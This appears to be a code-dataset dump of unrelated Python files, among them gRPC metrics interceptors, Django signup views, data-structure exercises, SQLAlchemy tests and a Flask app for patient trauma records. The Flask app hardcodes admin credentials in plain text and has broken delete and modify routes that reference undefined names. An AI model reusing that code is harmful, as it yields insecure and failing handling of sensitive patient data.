grpc_method=grpc_method).observe(max(default_timer() - start, 0))\n\n return new_behavior\n\n return _wrap_rpc_behavior(continuation(handler_call_details), latency_wrapper)\n\n\nclass ServiceLatencyInterceptor(grpc.ServerInterceptor):\n\n def __init__(self):\n pass\n\n def intercept_service(self, continuation, handler_call_details):\n client_call_method = handler_call_details.method\n parts = client_call_method.split(\"/\")\n grpc_service = parts[1]\n grpc_method = parts[2]\n\n def latency_wrapper(behavior, request_streaming, response_streaming):\n def new_behavior(request_or_iterator, service_context):\n start = time.time()\n try:\n return behavior(request_or_iterator, service_context)\n finally:\n SERVER_HANDLED_LATENCY_SECONDS.labels(\n grpc_type='UNARY',\n grpc_service=grpc_service,\n grpc_method=grpc_method).observe(max(time.time() - start, 0))\n\n return new_behavior\n\n return _wrap_rpc_behavior(continuation(handler_call_details), latency_wrapper)\n","sub_path":"python_grpc_prometheus/prometheus_server_interceptor.py","file_name":"prometheus_server_interceptor.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"366214136","text":"cases = int(input())\n\nfor case in range(cases):\n x1, y1, r1, x2, y2, r2 = [int(x) for x in input().split(' ')]\n\n # 만약 중심이 같다면\n if x1 == x2 and y1 == y2:\n if r1 == r2: # 반지름도 같다면 무수히 많다\n print(-1)\n else: # 반지름이 다르면 교점이 하나도 없다\n print(0)\n else: # 중심이 다르다면\n # 거리에 따라 조건이 달라지지\n distance = ((x1 - x2)**2 + (y1 - y2)**2)**.5\n\n if r1 + r2 == distance or abs(r1 - r2) == distance:\n print(1)\n elif abs(r1 - r2) < distance < r1 + r2:\n print(2)\n else:\n print(0)\n\n continue\n","sub_path":"BOJ/1002/1002.py","file_name":"1002.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156073059","text":"import chess\nimport numpy as np\n\nclass State(object):\n def __init__(self, board=None):\n if board is None:\n self.board = chess.Board()\n else:\n self.board = board\n\n def serialize(self):\n assert self.board.is_valid()\n\n bstate = np.zeros(64, np.uint8)\n for i in range(64):\n piece = self.board.piece_at(i)\n if piece is not None:\n print(piece)\n pass\n bstate = bstate.reshape(8,8)\n \n state = np.zeros((8, 8,5), np.uint8)\n\n state[:,:, 0]= (bstate>>3)&1\n state[:,:, 1]= (bstate>>2)&1\n state[:,:, 2]= (bstate>>1)&1\n state[:,:, 3]= (bstate>>0)&1\n\n\n\n # state[self.board.ep_square, :, :, 3] = 1\n\n state[:,:,4]= (self.board.turn * 1.0)\n\n \n\n \n return state\n \n def edges(self):\n return list(self.board.legal_moves)\n \n def value(self):\n return 1\n\nif __name__ == \"__main__\":\n s = State()\n print(s.edges())\n\n","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"300368941","text":"\r\ncours=lirecourslf(lnfppc)\r\nlcs=coursval(cours,'HERMES')\r\nmme(lcs,20)\r\np=[qi3macd,mt3macd(12,26,9)]\r\ncalculind3(lcs,p)\r\ncalculind4(lcs,p)\r\nmoyind(select,mme,14)\r\nmoyind(select,calculind4,p)\r\ntestind(select,mme,20)\r\n","sub_path":"src/pytrade/exbourseppc.py","file_name":"exbourseppc.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"62623795","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom djangoproject.users.forms import SignUpForm, UserForm, ProfileForm\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom .tokens import account_activation_token\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom djangoproject.settings import EMAIL_HOST_USER\n\n\ndef signup(request):\n if request.method == \"POST\":\n form = SignUpForm(request.POST)\n\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n\n current_site = get_current_site(request)\n subject = 'Activate your account.'\n message = render_to_string('users/active_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user),\n })\n to_email = form.cleaned_data.get('email')\n\n send_mail(\n subject,\n message,\n EMAIL_HOST_USER,\n [to_email],\n html_message=message\n )\n\n return redirect('confirm_email_address')\n else:\n form = SignUpForm()\n return render(request, 'users/signup.html', {'form': form})\n\n\ndef activate(request, uidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n (request, user)\n return redirect('signupsuccess')\n else:\n return redirect('signupdefeat')\n\n\ndef confirm_email_address(request):\n return render(request, 'users/confirm_email_address.html')\n\n\ndef signupsuccess(request):\n return render(request, 'users/signupsuccess.html')\n\n\ndef signupdefeat(request):\n return render(request, 'users/signupdefeat.html')\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n user_form = UserForm(request.POST, instance=request.user)\n profile_form = ProfileForm(\n request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(\n request, ('Your profile was successfully updated!'))\n return redirect('profile')\n else:\n messages.error(request, ('Please correct the error below.'))\n else:\n user_form = UserForm(instance=request.user)\n profile_form = ProfileForm(instance=request.user.profile)\n return render(request, 'users/profile.html', {\n 'user_form': user_form,\n 'profile_form': profile_form\n })\n","sub_path":"djangoproject/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14876767","text":"def gm(lst):\n nz = list(filter(lambda x: x != 0, lst))\n if len(nz) == 1: return nz[0]\n print(nz)\n print([bin(x)[2:] for x in nz])\n m = min(nz)\n idx = next((i for i in range(len(nz)) if nz[i] == m))\n new = []\n for i in filter(lambda y: y != idx, range(len(nz))):\n new += [nz[i] % m]\n new += [m]\n return gm(new)\n\n","sub_path":"70/hw/hw4_tests.py","file_name":"hw4_tests.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492905682","text":"from datetime import date\nfrom django.db import models\nfrom django.db.models import F\n\nfrom auditable.models import Auditable\nfrom .account_balance import AccountBalance\nfrom .credit_class import CreditClass\nfrom .organization_address import OrganizationAddress\nfrom .user_profile import UserProfile\nfrom ..managers.organization import OrganizationManager\n\n\nclass Organization(Auditable):\n name = models.CharField(\n db_column=\"organization_name\",\n db_comment=\"Name of the organization\",\n max_length=500,\n null=False,\n unique=True\n )\n\n short_name = models.CharField(\n db_column='short_name',\n db_comment='Short version of the organization name, used in generating some reports',\n unique=True,\n null=True,\n max_length=64\n )\n\n is_active = models.BooleanField(\n default=False,\n db_comment=\"Boolean Field to see if the organization is disabled \"\n \"or not.\"\n )\n is_government = models.BooleanField(\n default=False,\n db_comment=\"Flag to check whether this is the Government organization\"\n )\n\n @property\n def balance(self):\n \"\"\"\n Gets the class A and B balance for the current\n organization\n \"\"\"\n balance = {'A': 0, 'B': 0}\n account_balances = AccountBalance.objects.filter(\n organization_id=self.id,\n expiration_date=None\n ).order_by('-id')\n\n credit_class = CreditClass.objects.filter(credit_class=\"A\").first()\n for account_balance in account_balances:\n if account_balance.credit_class_id == credit_class.id:\n balance['A'] = account_balance.balance\n else:\n balance['B'] = account_balance.balance\n return balance\n\n @property\n def members(self):\n \"\"\"\n Gets the list of user for the current organization\n \"\"\"\n data = UserProfile.objects.filter(\n organization_id=self.id\n ).order_by(\n 'display_name', 'first_name', 'last_name'\n )\n\n return data\n\n @property\n def organization_address(self):\n \"\"\"\n Gets the active address for the organization\n \"\"\"\n data = OrganizationAddress.objects.filter(\n effective_date__lte=date.today(),\n organization_id=self.id\n ).exclude(\n expiration_date__lte=date.today()\n ).exclude(\n expiration_date=F('effective_date')\n ).order_by('-effective_date', '-update_timestamp')\n\n return data\n\n class Meta:\n db_table = 'organization'\n\n objects = OrganizationManager()\n\n db_table_comment = \\\n \"Contains a list of all of the recognized Vehicle suppliers, both \" \\\n \"past and present, as well as an entry for the government which is \" \\\n \"also considered an organization.\"\n","sub_path":"backend/api/models/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"377463491","text":"from team import *\n\nol=club('Olympique Lyonnais')\nt1=time.time()\nol.get_data()\nfor joueur in ol.liste_joueur:\n joueur.fill_dico()\n print (joueur.nom)\n\nt2=time.time()\nprint(t2-t1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113265075","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cloudygames', '0016_auto_20160224_1934'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='gamesession',\n name='streaming_port',\n field=models.CharField(max_length=5, default=30000),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='playersavedata',\n name='is_autosaved',\n field=models.BooleanField(default=False),\n ),\n ]\n","sub_path":"cloudygames/migrations/0017_auto_20160304_0046.py","file_name":"0017_auto_20160304_0046.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494824309","text":"from __future__ import print_function\nfrom app import app\nfrom flask import Flask, request, flash, render_template, url_for, redirect, session\nfrom app.forms import *\nfrom app.__init__ import db\nfrom app.models import *\nfrom config import dico_columns\nimport sys, pygal\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n bar_chart = pygal.Bar()\n bar_chart.title = \"Etat de stress aigu\"\n bar_chart.add(\"Integrite physique atteinte\",[TraumaTable.query.filter_by(event=True).paginate().total])\n bar_chart.add(\"Peur, impuissance, horreur\", [TraumaTable.query.filter_by(reaction=True).paginate().total])\n bar_chart.add(\"Torpeur\", [TraumaTable.query.filter_by(dissociation1=True).paginate().total])\n bar_chart.add(\"Cause de l'environement reduite\", [TraumaTable.query.filter_by(dissociation2=True).paginate().total])\n bar_chart.add(\"Derealisation\", [TraumaTable.query.filter_by(dissociation3=True).paginate().total])\n bar_chart.add(\"Depersonnalisation\", [TraumaTable.query.filter_by(dissociation4=True).paginate().total])\n bar_chart.add(\"Amnesie dissociative\", [TraumaTable.query.filter_by(dissociation5=True).paginate().total])\n bar_chart.add(\"Images\", [TraumaTable.query.filter_by(rememoration1=True).paginate().total])\n bar_chart.add(\"Pensees\", [TraumaTable.query.filter_by(rememoration2=True).paginate().total])\n bar_chart.add(\"Reves\", [TraumaTable.query.filter_by(rememoration3=True).paginate().total])\n bar_chart.add(\"Illusions\", [TraumaTable.query.filter_by(rememoration4=True).paginate().total])\n bar_chart.add(\"Flash-back\", [TraumaTable.query.filter_by(rememoration5=True).paginate().total])\n bar_chart.add(\"Souffrance a l'exposition\", [TraumaTable.query.filter_by(rememoration6=True).paginate().total])\n bar_chart.add(\"Persistance des stimulis\", [TraumaTable.query.filter_by(evitement=True).paginate().total])\n bar_chart.add(\"Symptomes anxieux\", [TraumaTable.query.filter_by(anxiete=True).paginate().total])\n bar_chart.add(\"Activite neurovegetative\", [TraumaTable.query.filter_by(neurovegetatif=True).paginate().total])\n bar_chart.add(\"Detresse clinique\", [TraumaTable.query.filter_by(detresse_clinique=True).paginate().total])\n bar_chart.add(\"Alteration du fonctionnment\", [TraumaTable.query.filter_by(alteration=True).paginate().total])\n chart = bar_chart.render_data_uri()\n return render_template('index.html', table = InfoTable.query.all(), chart = chart)\n\n@app.route('/login', methods=['POST'])\ndef do_admin_login():\n if request.form['password'] == 'ESCRIMES' and request.form['username'] == 'MNYERRO':\n session['logged_in'] = True\n return render_template('login.html')\n else:\n return index()\n\n@app.route('/patient/')\n@app.route('/patient//')\ndef fichepatient(idpatient, modif=None):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n return render_template('patient.html',\n patient = InfoTable.query.filter_by(id = idpatient).first(),\n facts = FactsTable.query.filter_by(info_id = idpatient).first(),\n trauma = TraumaTable.query.filter_by(info_id = idpatient).first(),\n info_id = idpatient,\n dico = dico_columns,\n modif = modif)\n\n\n@app.route('/form_info', methods = ['POST', 'GET'])\ndef info():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = GeneralInfo()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n else:\n info = InfoTable(firstname = form.data['firstname'],\n lastname = form.data['lastname'],\n date_of_birth = form.data['date_of_birth'],\n cellphone = form.data['cellphone'],\n adress = form.data['adress'],\n date_of_agression = form.data['date_of_agression'])\n db.session.add(info)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n\n@app.route('/modify_info', methods = ['POST', 'GET'])\ndef modify_info():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = GeneralInfo()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n else:\n info = InfoTable(firstname = form.data['firstname'],\n lastname = form.data['lastname'],\n date_of_birth = form.data['date_of_birth'],\n cellphone = form.data['cellphone'],\n adress = form.data['adress'],\n date_of_agression = form.data['date_of_agression'])\n db.session.add(info)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n\n\n@app.route('/form_facts/', methods = ['POST', 'GET'])\ndef facts(info_id):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = Facts()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('facts', info_id=info_id))\n else:\n facts = FactsTable(info_id = info_id,\n facts = form.data['facts'],\n felt_peri_aggression = form.data['felt_peri_aggression'],\n felt_post_aggression = form.data['felt_post_aggression'],\n ressenti = form.data['ressenti'])\n db.session.add(facts)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('facts', info_id=info_id))\n\n@app.route('/form_trauma/', methods = ['POST', 'GET'])\ndef trauma(info_id):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = Trauma()\n if request.method == 'POST':\n if form.validate() == False:\n flash(form.errors)\n return render_template('create_form.html', form = form, postlink = url_for('trauma', info_id=info_id))\n else:\n trauma = TraumaTable(info_id = info_id,\n event = form.data['event'],\n reaction = form.data['reaction'],\n dissociation1 = form.data['dissociation1'],\n dissociation2 = form.data['dissociation2'],\n dissociation3 = form.data['dissociation3'],\n dissociation4 = form.data['dissociation4'],\n dissociation5 = form.data['dissociation5'],\n rememoration1 = form.data['rememoration1'],\n rememoration2 = form.data['rememoration2'],\n rememoration3 = form.data['rememoration3'],\n rememoration4 = form.data['rememoration4'],\n rememoration5 = form.data['rememoration5'],\n rememoration6 = form.data['rememoration6'],\n evitement = form.data['evitement'],\n anxiete = form.data['anxiete'],\n neurovegetatif = form.data['neurovegetatif'],\n detresse_clinique = form.data['detresse_clinique'],\n alteration = form.data['alteration'],\n perturbation = form.data['pertubation'])\n db.session.add(trauma)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('trauma', info_id=info_id))\n\n@app.route('/delete/')\ndef deletepatient(patient):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n sessioninfo = db.session.object_session(InfoTable.query.filter_by(id=patient).first())\n fact = FactsTable.query.filter_by(info_id=patient).first()\n trauma = TraumaTable.query.filter_by(info_id=patient).first()\n sessioninfo.delete(InfoTable.query.filter_by(id=patient).first())\n sessioninfo.commit()\n if (fact):\n sessionfact = db.session.object_session(fact)\n sessionfact.delete(fact)\n sessionfact.commit()\n if (trauma):\n db.session.object_session(trauma)\n sessiontrauma.delete(trauma)\n sessiontrauma.commit()\n return redirect(url_for('index'))\n\n@app.route('/modify/', methods=['POST', 'GET'])\ndef modifypatient(field):\n #if (table == \"InfoTable\"):\n # user = InfoTable.query.filter_by(id=idpatient).first()\n field = newval\n return \"Salut\"\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"435269449","text":"class Node:\n\n def __init__(self, value):\n self.value = value #当前节点的值\n self.next = None #下一个节点\n\n\nclass List:\n\n def __init__(self):\n # 头节点\n self.head = Node(-1)\n\n # 前插法创建单链表\n def insert_before(self, data):\n for i in data:\n node = Node(i)\n\n if self.head.next is None:\n self.head.next = node\n else:\n node.next = self.head.next\n self.head.next = node\n\n # 尾插法创建单链表\n def insert_tail(self, data):\n\n tail = self.head.next\n\n for i in data:\n node = Node(i)\n\n if tail is None:\n self.head.next = node\n tail = node\n else:\n tail.next = node\n tail = node\n\n # 打印单链表\n def list_print(self):\n node = self.head.next\n\n while node:\n print(node.value)\n node = node.next\n\n # 清空链表\n def list_clear(self):\n self.head.next = None\n\n # 第i个节点前插入值为value的节点\n def list_element_add(self, i, value):\n\n node_new = Node(value)\n\n index = 0\n\n node = self.head.next\n\n while node:\n index = index + 1\n\n if index == i - 1:\n break\n\n node = node.next\n\n if node is None:\n return False\n\n node_new.next = node.next\n node.next = node_new\n\n\nif __name__ == '__main__':\n my_list = List()\n\n my_list.insert_before([1, 2, 3, 4, 5])\n my_list.list_print()\n\n my_list.list_clear()\n\n my_list.insert_tail([1, 2, 3, 4, 5])\n my_list.list_print()\n\n my_list.list_element_add(3, 10)\n my_list.list_print()","sub_path":"1806101055-官学琦/day0317/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"642398470","text":"# Реализовать постфиксную форму для операций умножения и сложения используя стек.\n\n\nclass Stack:\n def __init__(self):\n self.items = []\n\n def push(self, item):\n self.items.append(item)\n\n def pop(self):\n return self.items.pop()\n\n def count(self):\n l = []\n for item in self.items:\n if isinstance(item, int):\n l.append(item)\n\n for item in self.items:\n if item is '+':\n x = l.pop(0)\n y = l.pop(0)\n sum = x + y\n l.insert(0, sum)\n elif item is '*':\n x = l.pop(0)\n y = l.pop(0)\n res = x * y\n l.insert(0, res)\n else:\n return l.pop()\n\n\na = Stack()\na.push(1)\na.push(2)\na.push(3)\na.push('+')\na.push('*')\nprint(a.items)\nprint(a.count())\n","sub_path":"data_structures/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"507610872","text":"from __future__ import annotations\n\nfrom decimal import Decimal\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import TYPE_CHECKING\nfrom typing import TypeVar\nfrom typing import Union\nimport uuid\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import exc\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Numeric\nfrom sqlalchemy import select\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import testing\nfrom sqlalchemy import Uuid\nfrom sqlalchemy.orm import attribute_keyed_dict\nfrom sqlalchemy.orm import DeclarativeBase\nfrom sqlalchemy.orm import DynamicMapped\nfrom sqlalchemy.orm import KeyFuncDict\nfrom sqlalchemy.orm import Mapped\nfrom sqlalchemy.orm import mapped_column\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import WriteOnlyMapped\nfrom sqlalchemy.testing import expect_raises_message\nfrom sqlalchemy.testing import is_\nfrom sqlalchemy.testing import is_false\nfrom sqlalchemy.testing import is_true\nfrom sqlalchemy.util import compat\nfrom .test_typed_mapping import expect_annotation_syntax_error\nfrom .test_typed_mapping import MappedColumnTest as _MappedColumnTest\nfrom .test_typed_mapping import RelationshipLHSTest as _RelationshipLHSTest\nfrom .test_typed_mapping import (\n WriteOnlyRelationshipTest as _WriteOnlyRelationshipTest,\n)\n\n\"\"\"runs the annotation-sensitive tests from test_typed_mappings while\nhaving ``from __future__ import annotations`` in effect.\n\n\"\"\"\n\n\n_R = TypeVar(\"_R\")\n\nM = Mapped\n\n\nclass M3:\n pass\n\n\nclass MappedColumnTest(_MappedColumnTest):\n def test_indirect_mapped_name_module_level(self, decl_base):\n \"\"\"test #8759\n\n\n Note that M by definition has to be at the module level to be\n valid, and not locally declared here, this is in accordance with\n mypy::\n\n\n def make_class() -> None:\n ll = list\n\n x: ll[int] = [1, 2, 3]\n\n Will return::\n\n $ mypy test3.py\n test3.py:4: error: Variable \"ll\" is not valid as a type [valid-type]\n test3.py:4: note: See https://mypy.readthedocs.io/en/stable/common_issues.html#variables-vs-type-aliases\n Found 1 error in 1 file (checked 1 source file)\n\n Whereas the correct form is::\n\n ll = list\n\n def make_class() -> None:\n\n x: ll[int] = [1, 2, 3]\n\n\n \"\"\" # noqa: E501\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M[int] = mapped_column(primary_key=True)\n\n data: M[int] = mapped_column()\n\n data2: M[int]\n\n self.assert_compile(\n select(Foo), \"SELECT foo.id, foo.data, foo.data2 FROM foo\"\n )\n\n def test_indirect_mapped_name_local_level(self, decl_base):\n \"\"\"test #8759.\n\n this should raise an error.\n\n \"\"\"\n\n M2 = Mapped\n\n with expect_raises_message(\n exc.ArgumentError,\n r\"Could not interpret annotation M2\\[int\\]. Check that it \"\n \"uses names that are correctly imported at the module level.\",\n ):\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M2[int] = mapped_column(primary_key=True)\n\n data2: M2[int]\n\n def test_indirect_mapped_name_itswrong(self, decl_base):\n \"\"\"test #8759.\n\n this should raise an error.\n\n \"\"\"\n\n with expect_annotation_syntax_error(\"Foo.id\"):\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M3[int] = mapped_column(primary_key=True)\n\n data2: M3[int]\n\n def test_unions(self):\n our_type = Numeric(10, 2)\n\n class Base(DeclarativeBase):\n type_annotation_map = {Union[float, Decimal]: our_type}\n\n class User(Base):\n __tablename__ = \"users\"\n __table__: Table\n\n id: Mapped[int] = mapped_column(primary_key=True)\n\n data: Mapped[Union[float, Decimal]] = mapped_column()\n reverse_data: Mapped[Union[Decimal, float]] = mapped_column()\n\n optional_data: Mapped[\n Optional[Union[float, Decimal]]\n ] = mapped_column()\n\n # use Optional directly\n reverse_optional_data: Mapped[\n Optional[Union[Decimal, float]]\n ] = mapped_column()\n\n # use Union with None, same as Optional but presents differently\n # (Optional object with __origin__ Union vs. Union)\n reverse_u_optional_data: Mapped[\n Union[Decimal, float, None]\n ] = mapped_column()\n\n float_data: Mapped[float] = mapped_column()\n decimal_data: Mapped[Decimal] = mapped_column()\n\n if compat.py310:\n pep604_data: Mapped[float | Decimal] = mapped_column()\n pep604_reverse: Mapped[Decimal | float] = mapped_column()\n pep604_optional: Mapped[\n Decimal | float | None\n ] = mapped_column()\n pep604_data_fwd: Mapped[\"float | Decimal\"] = mapped_column()\n pep604_reverse_fwd: Mapped[\"Decimal | float\"] = mapped_column()\n pep604_optional_fwd: Mapped[\n \"Decimal | float | None\"\n ] = mapped_column()\n\n is_(User.__table__.c.data.type, our_type)\n is_false(User.__table__.c.data.nullable)\n is_(User.__table__.c.reverse_data.type, our_type)\n is_(User.__table__.c.optional_data.type, our_type)\n is_true(User.__table__.c.optional_data.nullable)\n\n is_(User.__table__.c.reverse_optional_data.type, our_type)\n is_(User.__table__.c.reverse_u_optional_data.type, our_type)\n is_true(User.__table__.c.reverse_optional_data.nullable)\n is_true(User.__table__.c.reverse_u_optional_data.nullable)\n\n is_(User.__table__.c.float_data.type, our_type)\n is_(User.__table__.c.decimal_data.type, our_type)\n\n if compat.py310:\n for suffix in (\"\", \"_fwd\"):\n data_col = User.__table__.c[f\"pep604_data{suffix}\"]\n reverse_col = User.__table__.c[f\"pep604_reverse{suffix}\"]\n optional_col = User.__table__.c[f\"pep604_optional{suffix}\"]\n is_(data_col.type, our_type)\n is_false(data_col.nullable)\n is_(reverse_col.type, our_type)\n is_false(reverse_col.nullable)\n is_(optional_col.type, our_type)\n is_true(optional_col.nullable)\n\n def test_typ_not_in_cls_namespace(self, decl_base):\n \"\"\"test #8742.\n\n This tests that when types are resolved, they use the ``__module__``\n of they class they are used within, not the mapped class.\n\n \"\"\"\n\n class Mixin:\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[uuid.UUID]\n\n class MyClass(Mixin, decl_base):\n # basically no type will be resolvable here\n __module__ = \"some.module\"\n __tablename__ = \"mytable\"\n\n is_(MyClass.id.expression.type._type_affinity, Integer)\n is_(MyClass.data.expression.type._type_affinity, Uuid)\n\n\nclass MappedOneArg(KeyFuncDict[str, _R]):\n pass\n\n\nclass RelationshipLHSTest(_RelationshipLHSTest):\n def test_bidirectional_literal_annotations(self, decl_base):\n \"\"\"test the 'string cleanup' function in orm/util.py, where\n we receive a string annotation like::\n\n \"Mapped[List[B]]\"\n\n Which then fails to evaluate because we don't have \"B\" yet.\n The annotation is converted on the fly to::\n\n 'Mapped[List[\"B\"]]'\n\n so that when we evaluated it, we get ``Mapped[List[\"B\"]]`` and\n can extract \"B\" as a string.\n\n \"\"\"\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs: Mapped[List[B]] = relationship(back_populates=\"a\")\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n a: Mapped[A] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n\n a1 = A(data=\"data\")\n b1 = B()\n a1.bs.append(b1)\n is_(a1, b1.a)\n\n def test_collection_class_uselist_implicit_fwd(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs_list: Mapped[List[B]] = relationship( # noqa: F821\n viewonly=True\n )\n bs_set: Mapped[Set[B]] = relationship(viewonly=True) # noqa: F821\n bs_list_warg: Mapped[List[B]] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n bs_set_warg: Mapped[Set[B]] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n\n b_one_to_one: Mapped[B] = relationship(viewonly=True) # noqa: F821\n\n b_one_to_one_warg: Mapped[B] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n a: Mapped[A] = relationship(viewonly=True)\n a_warg: Mapped[A] = relationship(\"A\", viewonly=True)\n\n is_(A.__mapper__.attrs[\"bs_list\"].collection_class, list)\n is_(A.__mapper__.attrs[\"bs_set\"].collection_class, set)\n is_(A.__mapper__.attrs[\"bs_list_warg\"].collection_class, list)\n is_(A.__mapper__.attrs[\"bs_set_warg\"].collection_class, set)\n is_true(A.__mapper__.attrs[\"bs_list\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_set\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_list_warg\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_set_warg\"].uselist)\n\n is_false(A.__mapper__.attrs[\"b_one_to_one\"].uselist)\n is_false(A.__mapper__.attrs[\"b_one_to_one_warg\"].uselist)\n\n is_false(B.__mapper__.attrs[\"a\"].uselist)\n is_false(B.__mapper__.attrs[\"a_warg\"].uselist)\n\n def test_collection_class_dict_attr_mapped_collection_literal_annotations(\n self, decl_base\n ):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[KeyFuncDict[str, B]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def test_collection_cls_attr_mapped_collection_dbl_literal_annotations(\n self, decl_base\n ):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[KeyFuncDict[str, \"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def 